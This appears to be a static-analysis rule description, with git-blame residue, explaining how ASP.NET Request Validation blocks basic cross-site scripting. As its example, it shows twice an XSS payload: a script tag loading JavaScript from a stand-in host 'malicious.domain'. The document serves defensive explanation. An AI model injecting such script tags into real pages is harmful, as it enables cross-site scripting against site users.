rspec/rules/S5753/description.adoc

ASP.NET 1.1+ comes with a feature called _Request Validation_, preventing the server to accept content containing un-encoded HTML. This feature comes as a first protection layer against Cross-Site Scripting (XSS) attacks and act as a simple Web Application Firewall (WAF) rejecting requests potentially containing malicious content.

While this feature is not a silver bullet to prevent all XSS attacks, it helps to catch basic ones. It will for example prevent ``++<script type="text/javascript" src="https://malicious.domain/payload.js">++`` to reach your Controller.


Note: _Request Validation_ feature being only available for ASP.NET, no Security Hotspot is raised on ASP.NET Core applications.
Nightly update 2021-01-13 11:35:08 +00:00			`ASP.NET 1.1+ comes with a feature called _Request Validation_, preventing the server to accept content containing un-encoded HTML. This feature comes as a first protection layer against Cross-Site Scripting (XSS) attacks and act as a simple Web Application Firewall (WAF) rejecting requests potentially containing malicious content.`
Force linebreaks 2021-02-02 15:02:10 +01:00
unescape the links inside in-line code 2021-02-08 19:11:39 +01:00			While this feature is not a silver bullet to prevent all XSS attacks, it helps to catch basic ones. It will for example prevent ``++<script type="text/javascript" src="https://malicious.domain/payload.js">++`` to reach your Controller.
Nightly update 2021-01-13 11:35:08 +00:00
Force linebreaks 2021-02-02 15:02:10 +01:00
Nightly update 2021-01-13 11:35:08 +00:00			`Note: _Request Validation_ feature being only available for ASP.NET, no Security Hotspot is raised on ASP.NET Core applications.`